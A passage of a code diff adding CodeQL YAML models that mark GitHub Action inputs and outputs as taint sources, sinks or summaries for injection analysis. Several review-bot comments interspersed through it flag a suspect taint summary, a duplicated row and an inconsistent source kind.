+ - ["jitterbit/get-changed-files", "*", "output.renamed", "filename", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.added_modified", "filename", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.deleted", "filename", "manual"]
diff --git a/actions/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml b/actions/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml
new file mode 100644
index 000000000000..c6d3c5cfb48e
--- /dev/null
+++ b/actions/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/jsdaniell_create-json.model.yml b/actions/ql/lib/ext/manual/jsdaniell_create-json.model.yml
new file mode 100644
index 000000000000..697189cfbd01
--- /dev/null
+++ b/actions/ql/lib/ext/manual/jsdaniell_create-json.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"]
+ - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"]
+ - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml b/actions/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml
new file mode 100644
index 000000000000..7f82a8b74f5d
--- /dev/null
+++ b/actions/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml
@@ -0,0 +1,12 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/jsmith/changes-since-last-tag
+ - ["jsmith/changes-since-last-tag", "*", "output.files", "filename", "manual"]
+ - ["jsmith/changes-since-last-tag", "*", "output.added", "filename", "manual"]
+ - ["jsmith/changes-since-last-tag", "*", "output.modified", "filename", "manual"]
+ - ["jsmith/changes-since-last-tag", "*", "output.removed", "filename", "manual"]
+ - ["jsmith/changes-since-last-tag", "*", "output.renamed", "filename", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/jurplel_install-qt-action.model.yml b/actions/ql/lib/ext/manual/jurplel_install-qt-action.model.yml
new file mode 100644
index 000000000000..95bd63fb22e1
--- /dev/null
+++ b/actions/ql/lib/ext/manual/jurplel_install-qt-action.model.yml
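Review bot: The jsdaniell/create-json summary rows propagate taint from `input.name`, `input.json` and `input.dir` into `output.successfully`, an output whose name reads like a boolean status flag rather than content derived from those inputs. If that is what it is, these three rows would manufacture flow that never happens at runtime and produce spurious paths downstream instead of modelling a real propagation. Worth checking against the action's own output definitions before merging; if the output only reports success, drop the three rows or point them at whichever output actually carries the input text.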
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.dir", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.extra", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml b/actions/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml
new file mode 100644
index 000000000000..1fc8b037530a
--- /dev/null
+++ b/actions/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml
@@ -0,0 +1,13 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"]
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"]
+ - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"]
+ - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml b/actions/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml
new file mode 100644
index 000000000000..40b8b093957d
--- /dev/null
+++ b/actions/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["kaisugi/action-regex-match", "*", "input.text", "output.*", "taint", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml b/actions/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml
new file mode 100644
index 000000000000..0c3cf006d3eb
--- /dev/null
+++ b/actions/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml
@@ -0,0 +1,8 @@
+
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/karpikpl/list-changed-files-action
+ - ["karpikpl/list-changed-files-action", "*", "output.changed_files", "filename", "manual"]
diff --git a/actions/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml b/actions/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml
new file mode 100644
index 000000000000..e61008f160ed
--- /dev/null
+++ b/actions/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"]
+ - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"]
diff --git a/actions/ql/lib/ext/manual/knu_changed-files.model.yml b/actions/ql/lib/ext/manual/knu_changed-files.model.yml
new file mode 100644
index 000000000000..96e4e8f02f5c
--- /dev/null
+++ b/actions/ql/lib/ext/manual/knu_changed-files.model.yml
@@ -0,0 +1,11 @@
+
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/knu/changed-files
+ - ["knu/changed-files", "*", "output.changed_files", "filename", "manual"]
+ - ["knu/changed-files", "*", "output.changed_files_json", "filename", "manual"]
+ - ["knu/changed-files", "*", "output.matched_files", "filename", "manual"]
+ - ["knu/changed-files", "*", "output.matched_files_json", "filename", "manual"]
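Review bot: The khan/pull-request-comment-trigger model lists the identical row twice — `output.comment_body` as a `text` source on both data lines — so either the second line is a leftover to delete or a different output was intended and its real name should be substituted. A duplicate row does not change what is detected, but it makes the model look like it covers two outputs when it covers one. Separately, the karpikpl/list-changed-files-action and knu/changed-files files open with an empty `+` line before `extensions:`, which none of the other model files in this change do; dropping it keeps the files uniform.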
diff --git a/actions/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml b/actions/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml
new file mode 100644
index 000000000000..feff62d16c07
--- /dev/null
+++ b/actions/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml b/actions/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml
new file mode 100644
index 000000000000..b74e721e577f
--- /dev/null
+++ b/actions/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"]
+ - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml b/actions/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml
new file mode 100644
index 000000000000..d59a122a53ff
--- /dev/null
+++ b/actions/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml b/actions/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml
new file mode 100644
index 000000000000..8e108765b407
--- /dev/null
+++ b/actions/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["lots0logs/gh-action-get-changed-files", "*", "output.all", "PR changed files", "manual"]
+ - ["lots0logs/gh-action-get-changed-files", "*", "output.added", "PR changed files", "manual"]
+ - ["lots0logs/gh-action-get-changed-files", "*", "output.modified", "PR changed files", "manual"]
+ - ["lots0logs/gh-action-get-changed-files", "*", "output.renamed", "PR changed files", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml b/actions/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml
new file mode 100644
index 000000000000..6f66e6cf867e
--- /dev/null
+++ b/actions/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml b/actions/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml
new file mode 100644
index 000000000000..acdc250e3535
--- /dev/null
+++ b/actions/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["luizfelipelaviola/parse-plain-dotenv", "*", "input.data", "envvar-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml b/actions/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml
new file mode 100644
index 000000000000..69298631c6e2
--- /dev/null
+++ b/actions/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml
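Review bot: The four lots0logs/gh-action-get-changed-files rows use the source kind `"PR changed files"`, while every other changed-file source model in this change (jitterbit/get-changed-files, jsmith/changes-since-last-tag, karpikpl/list-changed-files-action, knu/changed-files, martinhaintz/ga-file-list) uses `"filename"`. If the library selects source rows by that kind string, as the uniform use of `"filename"` elsewhere suggests, these outputs would never register as untrusted file-name sources and any flow from them would be missed without any error. Changing the fourth column of the four rows to `"filename"` resolves it; the trailing empty `+` line that ends the hunk can go at the same time.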
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"]
+ - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/magefile_mage-action.model.yml b/actions/ql/lib/ext/manual/magefile_mage-action.model.yml
new file mode 100644
index 000000000000..85631268af72
--- /dev/null
+++ b/actions/ql/lib/ext/manual/magefile_mage-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/maierj_fastlane-action.model.yml b/actions/ql/lib/ext/manual/maierj_fastlane-action.model.yml
new file mode 100644
index 000000000000..18dbcab6f539
--- /dev/null
+++ b/actions/ql/lib/ext/manual/maierj_fastlane-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"]
+ - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"]
+ - ["maierj/fastlane-action", "*", "input.env", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml b/actions/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml
new file mode 100644
index 000000000000..5c3b4b82bc22
--- /dev/null
+++ b/actions/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"]
+ - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"]
+ - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection", "manual"]
+ - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/marocchino_on_artifact.model.yml b/actions/ql/lib/ext/manual/marocchino_on_artifact.model.yml
new file mode 100644
index 000000000000..d86870f2f152
--- /dev/null
+++ b/actions/ql/lib/ext/manual/marocchino_on_artifact.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"]
diff --git a/actions/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml b/actions/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml
new file mode 100644
index 000000000000..06b1f3afd5d6
--- /dev/null
+++ b/actions/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/martinhaintz/ga-file-list
+ - ["martinhaintz/ga-file-list", "*", "output.files", "filename", "manual"]
+ - ["martinhaintz/ga-file-list", "*", "output.file_names", "filename", "manual"]
diff --git a/actions/ql/lib/ext/manual/mattdavis0351_actions.model.yml b/actions/ql/lib/ext/manual/mattdavis0351_actions.model.yml
new file mode 100644
index 000000000000..1d0e33bb277d
--- /dev/null
+++ b/actions/ql/lib/ext/manual/mattdavis0351_actions.model.yml
@@ -0,0 +1,16 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"]
+ - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"]
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"]
+ - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"]
+ - ["mattdavis0351/actions", "*", "input.image-name", "command-injection", "manual"]
+ - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection", "manual"]
+ - ["mattdavis0351/actions", "*", "input.tag", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml b/actions/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml
new file mode 100644
index 000000000000..f08bf9ac6e0d
--- /dev/null
+++ b/actions/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml b/actions/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml
new file mode 100644
index 000000000000..4e0800281d20
--- /dev/null
+++ b/actions/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml b/actions/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml
new file mode 100644
index 000000000000..4ea7e022cbdb
--- /dev/null
+++ b/actions/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"]
+ - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/mikefarah_yq.model.yml b/actions/ql/lib/ext/manual/mikefarah_yq.model.yml
new file mode 100644
index 000000000000..b16fa3c545b8
--- /dev/null
+++ b/actions/ql/lib/ext/manual/mikefarah_yq.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["mikefarah/yq", "*", "input.cmd", "code-injection", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml b/actions/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml
new file mode 100644
index 000000000000..09a9673ee896
--- /dev/null
+++ b/actions/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml b/actions/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml
new file mode 100644
index 000000000000..d3b34019844a
--- /dev/null
+++ b/actions/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml
@@ -0,0 +1,16 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/msys2_setup-msys2.model.yml b/actions/ql/lib/ext/manual/msys2_setup-msys2.model.yml
new file mode 100644
index 000000000000..59cf5d2cf025
--- /dev/null
+++ b/actions/ql/lib/ext/manual/msys2_setup-msys2.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"]
+ - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml b/actions/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml
new file mode 100644
index 000000000000..4664937e6bc4
--- /dev/null
+++ b/actions/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"]
+ - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml b/actions/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml
new file mode 100644
index 000000000000..28dd99378bf5
--- /dev/null
+++ b/actions/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml
@@ -0,0 +1,12 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"]
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"]
+ - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml b/actions/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml
new file mode 100644
index 000000000000..7ca3034593bf
--- /dev/null
+++ b/actions/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/nanasess_setup-php.model.yml b/actions/ql/lib/ext/manual/nanasess_setup-php.model.yml
new file mode 100644
index 000000000000..8af1107d6864
--- /dev/null
+++ b/actions/ql/lib/ext/manual/nanasess_setup-php.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/nick-fields_retry.model.yml b/actions/ql/lib/ext/manual/nick-fields_retry.model.yml
new file mode 100644
index 000000000000..86c0bb7ccfb9
--- /dev/null
+++ b/actions/ql/lib/ext/manual/nick-fields_retry.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"]
+ - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"]
+ - ["nick-fields/retry", "*", "input.command", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/octokit_graphql-action.model.yml b/actions/ql/lib/ext/manual/octokit_graphql-action.model.yml
new file mode 100644
index 000000000000..df140b9e570a
--- /dev/null
+++ b/actions/ql/lib/ext/manual/octokit_graphql-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"]
diff --git a/actions/ql/lib/ext/manual/octokit_request-action.model.yml b/actions/ql/lib/ext/manual/octokit_request-action.model.yml
new file mode 100644
index 000000000000..f0f684aa4caa
--- /dev/null
+++ b/actions/ql/lib/ext/manual/octokit_request-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"]
diff --git a/actions/ql/lib/ext/manual/olafurpg_setup-scala.model.yml b/actions/ql/lib/ext/manual/olafurpg_setup-scala.model.yml
new file mode 100644
index 000000000000..8149f79fa641
--- /dev/null
+++ b/actions/ql/lib/ext/manual/olafurpg_setup-scala.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml b/actions/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml
new file mode 100644
index 000000000000..4f2b95eac61e
--- /dev/null
+++ b/actions/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml b/actions/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml
new file mode 100644
index 000000000000..8abafc6ae7d0
--- /dev/null
+++ b/actions/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["paulschuberth/regex-extract-action", "*", "input.haystack", "output.matches", "taint", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml b/actions/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml
new file mode 100644
index 000000000000..f0dcfa3ea4ef
--- /dev/null
+++ b/actions/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml b/actions/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml
new file mode 100644
index 000000000000..2268d00d332a
--- /dev/null
+++ b/actions/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"]
diff --git a/actions/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml b/actions/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml
new file mode 100644
index 000000000000..ab55b9b62144
--- /dev/null
+++ b/actions/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["peter-murray/issue-forms-body-parser", "*", "output.payload", "text", "manual"]
diff --git a/actions/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml b/actions/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml
new file mode 100644
index 000000000000..1ec53228c169
--- /dev/null
+++ b/actions/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"]
+ - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"]
+ - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml b/actions/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
new file mode 100644
index 000000000000..97564731d2cd
--- /dev/null
+++ b/actions/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["potiuk/get-workflow-origin", "*", "output.sourceHeadBranch", "branch", "manual"]
diff --git a/actions/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml b/actions/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml
new file mode 100644
index 000000000000..b43c13276573
--- /dev/null
+++ b/actions/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"]
+ - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/py-actions_flake8.model.yml b/actions/ql/lib/ext/manual/py-actions_flake8.model.yml
new file mode 100644
index 000000000000..d9edf347c335
--- /dev/null
+++ b/actions/ql/lib/ext/manual/py-actions_flake8.model.yml
@@ -0,0 +1,12 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.path", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.ignore", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.exclude", "command-injection", "manual"]
